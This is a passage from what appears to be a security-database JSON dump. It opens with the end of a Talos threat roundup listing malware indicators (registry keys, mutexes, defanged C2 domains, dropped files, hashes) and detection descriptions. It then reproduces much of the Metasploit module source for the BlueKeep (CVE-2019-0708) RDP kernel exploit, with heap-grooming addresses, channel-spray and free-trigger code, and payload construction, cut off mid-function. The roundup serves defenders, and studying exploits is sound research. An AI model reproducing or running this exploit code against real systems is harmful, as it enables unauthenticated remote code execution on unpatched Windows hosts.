\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: f8782a013a20610e09216f21b705d856 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: f8782a013a20610e09216f21b705d856 ` | 
1 \n`<HKCU>\\SOFTWARE\\F8782A013A20610E09216F21B705D856 \nValue Name: [kl] ` | 1 \n`<HKCR>\\LOCAL SETTINGS\\SOFTWARE\\MICROSOFT\\WINDOWS\\SHELL\\MUICACHE \nValue Name: C:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll ` | 1 \n`<HKCR>\\LOCAL SETTINGS\\SOFTWARE\\MICROSOFT\\WINDOWS\\SHELL\\MUICACHE \nValue Name: C:\\Program Files (x86)\\Windows NT\\Accessories\\WORDPAD.EXE ` | 1 \n`<HKCU>\\SOFTWARE\\A283D5EDA9CD874157ADF0AF127AFD04 \nValue Name: hp ` | 1 \nMutexes | Occurrences \n---|--- \n`<32 random hex characters>` | 11 \n`5cd8f17f4086744065eb0992a09e05a2` | 3 \n`c550d26ee8bebb2d926652be861588b2SGFjS2Vk` | 2 \n`Acrobat Instance Mutex` | 1 \n`a283d5eda9cd874157adf0af127afd04SGFjS2Vk` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337468` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337490` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723374A4` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723374CC` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d47233758C` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723376DC` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337710` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337750` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d472337828` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d4723378B0` | 1 \n`2AC1A572DB6944B0A65C38C4140AF2F44d473EA6134` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`156[.]216[.]33[.]12` | 1 \n`141[.]255[.]152[.]56` | 1 \n`141[.]255[.]153[.]212` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`imaneblueyes[.]ddns[.]net` | 2 \n`mestry1212[.]ddns[.]net` | 2 \n`amrfarag[.]ddns[.]net` | 1 \n`njs1[.]ddns[.]net` | 1 \n`emlpesa[.]ddns[.]net` | 1 \n`facebock[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\server.exe` | 4 \n`%TEMP%\\Trojan.exe` | 3 \n`%TEMP%\\Trojan.exe.tmp` | 3 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c2405709a54ec95cddcc5c598f34081c.exe` | 3 \n`%TEMP%\\Chrom.exe` | 3 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c550d26ee8bebb2d926652be861588b2.exe` | 2 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\AdobeCMapFnt09.lst` | 1 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\SharedDataEvents` | 1 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\UserCache.bin` | 1 \n`%LOCALAPPDATA%\\Adobe\\Acrobat\\9.0\\Cache\\AcroFnt09.lst` | 1 \n`%APPDATA%\\Adobe\\Acrobat\\9.0\\SharedDataEvents-journal` | 1 \n`%APPDATA%\\Microsoft.exe` | 1 \n`%TEMP%\\Windows` | 1 \n`%TEMP%\\Windows Update.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\f8782a013a20610e09216f21b705d856.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\9de3566e57ab5f0665456e9f5754a7d3.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\2f08ade869f075aa32331d77d03e57e5.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\77ca5176ec9da801e6934f1f927759d5.exe` | 1 \n \n#### File Hashes\n\n` 186dae58f108dac74fd244a34d8a508232ae314301992e52a166c2e6f82e50e3 28fa81e67c51b9ba0c71dde4b5ad4df0d3314f81deef202492be2d85a4af6c05 3335c86b6906fc3f0fc3ada7dec5fde0c10be9e8b0c20f9fe8719f2c54ff277b 41d83b4ddf1b6861b2f7b5f3fd949f208cd0bdd96966217c61b5d5ea45c3a1c4 488864edfd3a995a2733f842bdf18cdf638b1f03563fc1959da6b04c719f09d9 6e25e2b859bf13299c0c116bf94bd86ea97c470aada3fa94bc2a4522ca1a471b 70b10d403f814d4bc94e0fdaf9584563d47bb36d72a1afce40cfd0ebec1eafd9 7274ef9fd2c4bab07a9a3ca46fb0f4b37107748fb9d8632e27faeba6be597b46 
77149e99944db0ebe0c44bee046dad27529a104c6b9214973fba67f707bb3566 7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8 a0e50a68677941f3b7e68f9d32e4d1e014dac945a2e01f6bb823e58adeb7ec09 aa74ffa3991bf176f7d9eca8da00f379f735bd2d3acd7e9dd74fc041bbf84d01 c10cfd2c2141fa2d49f0d6f1238e844b51ed3381f6c63fed03792ec90a198fce c1938290fa67d53419918fec56e9f2ee07627fd0f8c279fa7f13357c624041e7 e3b41f2a9223a9531b94c257cba97ecd5b075a04523e5f19c9bb07396097a99a f0d1321a4f4774b87d74b8d5a18be28d3dae01361f0d28be599e7bb955a140f8 fc6b24794dd8168be2adc39d831cd18ea43f7cd9e91942228df5fc70606c509e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tG2uI9opyTk/XjSDQ5m-myI/AAAAAAAADNc/NkqvmKyZbO8gkeoXFOH1wp3aueQpOmXwACLcBGAsYHQ/s1600/7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ct8r4BwFvwE/XjSDdsWsbAI/AAAAAAAADNg/nWdA30YxEGg5xGJqC4wkKy3twoj32XZLACLcBGAsYHQ/s1600/7cf3348c2711766f5ef2222a3cc74033fa08577a023f4e69fd921acc50810fa8_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Kuluoz-7561668-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`2GVWNQJz1` | 25 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences
---|---

Files and or directories created | Occurrences
---|---

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-OSbT7NdjF6E/XjSEd5FmZCI/AAAAAAAADNw/WcXI_7ozqtQ7hzh3aK3SaIiqqG6zDkxiwCLcBGAsYHQ/s1600/078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-VmlE7uFrjig/XjSEiBiRqnI/AAAAAAAADN0/O6dEhUhfTG8wWeorN1DStvNNSwJ4zdB9QCLcBGAsYHQ/s1600/078c9cfcab1871f10a2f8168a18f40dd5c90d7900f82ba73c16bd2425fee430e_tg.png)

* * *

### Win.Trojan.SmokeLoader-7562031-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---

Mutexes | Occurrences
---|---

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-jObWf75rAgQ/XjSEx05OTYI/AAAAAAAADOA/5TU6275HNLQ70PVigbku0GOX4WFyEj8EQCLcBGAsYHQ/s1600/4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-KAiZHwvmt9s/XjSE1G8rcuI/AAAAAAAADOE/kPJh8vi53TQFO6hEVJJrgNWpobvwadaxwCLcBGAsYHQ/s1600/4a461c876e41c8f10b8c682311650f535d607089e3aa930aecfcf7d0400bfb18_tg.png)

#### Umbrella

[Umbrella detection screenshot](https://1.bp.blogspot.com/-aLHBzyZyDwQ/XjSE5PT3F7I/AAAAAAAADOI/5uoJ7Gtx9sQ7ZhTD9iE6YeZsjAD4N87vQCLcBGAsYHQ/s1600/3c9dab4a204a151e2658a66e948a71790e876c657f48fd449cc57ecd79b50a77_umbrella.png)

* * *

### Win.Malware.Nymaim-7565328-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---

Mutexes | Occurrences
---|---

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-55F7MMYEjbw/XjSFI_J_-UI/AAAAAAAADOY/bMfRIAduw9o9fyJefhLICn7mV9jVZ3CsgCLcBGAsYHQ/s1600/d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-jQQJou9JHDg/XjSFOkuR7bI/AAAAAAAADOc/hCDIPBhEjgMJ4KGRUiAxMB_CG7kYfPjPACLcBGAsYHQ/s1600/d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2_tg.png)

#### Umbrella

[Umbrella detection screenshot](https://1.bp.blogspot.com/-jN2yfrOW9To/XjSFUu8wOzI/AAAAAAAADOg/Wbfgy4U0mU48sgVrb2lq7D5JNt6xtw0IACLcBGAsYHQ/s1600/8875970e47c112f058e29d254371350ce058376a791fd9fdabad2ab2ed8dc83c_umbrella.png)

* * *

### Win.Packed.ZBot-7563206-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---

Files and or directories created | Occurrences
---|---

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-wJS2RzuoO5w/XjSFhT8K3YI/AAAAAAAADOs/bMXs5otiJvY7XaB3nqAKDGcgedf8QHRYACLcBGAsYHQ/s1600/b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-Z8WsKJoT9X0/XjSFlNTxwMI/AAAAAAAADO0/dycRgnHvs8gUYsBf1azs8gldBOugusg5QCLcBGAsYHQ/s1600/b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63_tg.png)

* * *

### PUA.Win.File.Dealply-7563212-0

#### Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---

*See JSON for more IOCs

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

[AMP detection screenshot](https://1.bp.blogspot.com/-hHtzSMciKKg/XjSF1b1xqZI/AAAAAAAADPA/erzglCJ_LE8iKieua3bRC4-gZtrOja98gCLcBGAsYHQ/s1600/10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2_amp.png)

#### ThreatGrid

[ThreatGrid detection screenshot](https://1.bp.blogspot.com/-IcwP4FQEYGA/XjSF40IhQsI/AAAAAAAADPE/tKpgXAIY_HIVn0wpKOMg4vehP9spNi57QCLcBGAsYHQ/s1600/10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2_tg.png)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (5959)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Process hollowing detected - (313)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.

Kovter injection detected - (220)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Gamarue malware detected - (188)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Installcore adware detected - (111)

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on webpages.
Adware is known to sometimes download and install malware.

Excessively long PowerShell command detected - (84)

A PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

Reverse http payload detected - (32)

An exploit payload intended to connect back to an attacker-controlled host using HTTP has been detected.

Atom Bombing code injection technique detected - (32)

A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.

Dealply adware detected - (22)

DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Corebot malware detected - (16)

Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system that enables it to load a variety of features from the C&C server at any time. 
Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2020-01-31T12:51:42", "published": "2020-01-31T12:51:42", "id": "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3rXNzEU5vIw/threat-roundup-0124-0131.html", "type": "talosblog", "title": "Threat Roundup for January 24 to January 31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-09-24T06:46:41", "description": "", "published": "2019-09-23T00:00:00", "type": "packetstorm", "title": "BlueKeep RDP Remote Windows Kernel Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-09-23T00:00:00", "id": "PACKETSTORM:154579", "href": "https://packetstormsecurity.com/files/154579/BlueKeep-RDP-Remote-Windows-Kernel-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# Exploitation and Caveats from zerosum0x0: \n# \n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally. \n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py) \n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120. \n# 4. RDP has chunked messages, so we use this to groom. \n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120. \n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND. \n# i. RDPSND only works when \n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0 \n# ii. This registry key is not a default setting for server 2008 R2. \n# We should use alternate groom channels or at least detect the \n# channel in advance. \n# 5. 
Use chunked grooming to fit new data in the freed channel, account for \n# the allocation header size (like 0x38 I think?). At offset 0x100? is where \n# the \"call [rax]\" gadget will get its pointer from. \n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7 \n# i. Hot-swap memory is another problem because, with certain VMWare and \n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP \n# start. This can be anywhere from 100 mb to gigabytes of offset \n# before the NPP start. \n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB \n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need \n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an \n# indirect call \n# d. We are limited to 0x400 payloads by channel chunk max size. My \n# current shellcode is a twin shellcode with eggfinders. I spam the \n# kernel payload and user payload, and if user payload is called first it \n# will egghunt for the kernel payload. \n# 6. After channel hole is filled and the NPP is spammed up with shellcode, \n# trigger the free by closing the socket. \n# \n# TODO: \n# * Detect OS specifics / obtain memory leak to determine NPP start address. \n# * Write the XP/2003 portions grooming MS_T120. \n# * Detect if RDPSND grooming is working or not? \n# * Expand channels besides RDPSND/MS_T120 for grooming. \n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/ \n# \n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming \n# MS_T120 on XP... 
should be same process as the RDPSND \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ManualRanking \n \nUSERMODE_EGG = 0xb00dac0fefe31337 \nKERNELMODE_EGG = 0xb00dac0fefe42069 \n \nCHUNK_SIZE = 0x400 \nHEADER_SIZE = 0x48 \n \ninclude Msf::Exploit::Remote::RDP \ninclude Msf::Exploit::Remote::CheckScanner \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free', \n'Description' => %q( \nThe RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, \nallowing a malformed Disconnect Provider Indication message to cause use-after-free. \nWith a controllable data/size remote nonpaged pool spray, an indirect call gadget of \nthe freed channel is used to achieve arbitrary code execution. \n), \n'Author' => \n[ \n'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit \n'Ryan Hanson', # @ryHanson - Original exploit \n'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module \n'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-0708'], \n['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'WfsDelay' => 5, \n'RDP_CLIENT_NAME' => 'ethdev', \n'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep' \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => CHUNK_SIZE - HEADER_SIZE, \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ \n'Automatic targeting via fingerprinting', \n{ \n'Arch' => [ARCH_X64], \n'FingerprintOnly' => true \n}, \n], \n# \n# \n# Windows 2008 R2 requires the following registry change from default: \n# \n# [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd] \n# \"fDisableCam\"=dword:00000000 \n# \n[ \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)', \n{ \n'Platform' => 'win', 
\n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8003800000, \n'GROOMSIZE' => 100 \n} \n], \n[ \n# This works with Virtualbox 6 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8002407000 \n} \n], \n[ \n# This address works on VMWare 14 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8030c00000 \n} \n], \n[ \n# This address works on VMWare 15 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8018C00000 \n} \n], \n[ \n# This address works on VMWare 15.1 \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8018c08000 \n} \n], \n[ \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8102407000 \n} \n], \n[ \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8018c08000 \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 14 2019', \n'Notes' => \n{ \n'AKA' => ['Bluekeep'] \n} \n)) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]), \nOptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]), \nOptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]), \n] \n) \nend \n \ndef exploit \nunless check == CheckCode::Vulnerable || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Set ForceExploit to override') \nend \n \nif target['FingerprintOnly'] \nfail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually') \nend \n \nbegin \nrdp_connect \nrescue ::Errno::ETIMEDOUT, 
Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError \nfail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') \nend \n \nis_rdp, server_selected_proto = rdp_check_protocol \nunless is_rdp \nfail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') \nend \n \n# We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us \n# from exploiting the target. \nif [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto) \nfail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.') \nend \n \nchans = [ \n['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP], \n[datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], \n[datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], \n['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_T120', RDPConstants::CHAN_INITIALIZED | 
RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n] \n \n@mst120_chan_id = 1004 + chans.length - 1 \n \nunless rdp_negotiate_security(chans, server_selected_proto) \nfail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.') \nend \n \nrdp_establish_session \n \nrdp_dispatch_loop \nend \n \nprivate \n \n# This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is \n# received on a channel, and this is when we need to kick off our exploit. \ndef rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data) \n# We have to do the default behaviour first. \nsuper(pkt, user, chan_id, flags, data) \n \ngroom_size = datastore['GROOMSIZE'] \npool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size) \ngroom_chan_count = datastore['GROOMCHANNELCOUNT'] \n \npayloads = create_payloads(pool_addr) \n \nprint_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\") \n \ntarget_channel_id = chan_id + 1 \n \nspray_buffer = create_exploit_channel_buffer(pool_addr) \nspray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF) \nfree_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80 \n \nprint_status(\"Surfing channels ...\") \nrdp_send(spray_channel * 1024) \nrdp_send(free_trigger) \n \nchan_surf_size = 0x421 \nspray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min \nchan_surf_packet = spray_channel * spray_packets \nchan_surf_count = chan_surf_size / spray_packets \n \nchan_surf_count.times do \nrdp_send(chan_surf_packet) \nend \n \nprint_status(\"Lobbing eggs ...\") \n \ngroom_mb = groom_size * 1024 / payloads.length \n \ngroom_mb.times do \ntpkts = '' \nfor c in 0..groom_chan_count \npayloads.each do |p| \ntpkts += rdp_create_channel_msg(self.rdp_user_id, 
target_channel_id + c, p, 0, 0xFFFFFFF) \nend \nend \nrdp_send(tpkts) \nend \n \n# Terminating and disconnecting forces the USE \nprint_status(\"Forcing the USE of FREE'd object ...\") \nrdp_terminate \nrdp_disconnect \nend \n \n# Helper function to create the kernel mode payload and the usermode payload with \n# the egg hunter prefix. \ndef create_payloads(pool_address) \nbegin \n[kernel_mode_payload, user_mode_payload].map { |p| \n[ \npool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg \np \n].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\") \n} \nrescue => ex \nprint_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\") \nend \nend \n \ndef assemble_with_fixups(asm) \n# Rewrite all instructions of form 'lea reg, [rel label]' as relative \n# offsets for the instruction pointer, since metasm's 'ModRM' parser does \n# not grok that syntax. \nlea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/ \nasm.gsub!(lea_rel) do |match| \nmatch = \"lea #{$1}, [rip + #{$2}]\" \nend \n \n# metasm encodes all rep instructions as repnz \n# https://github.com/jjyg/metasm/pull/40 \nasm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4') \n \nencoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded \n \n# Fixup above rewritten instructions with the relative label offsets \nencoded.reloc.each do |offset, reloc| \ntarget = reloc.target.to_s \nif encoded.export.key?(target) \n# Note: this 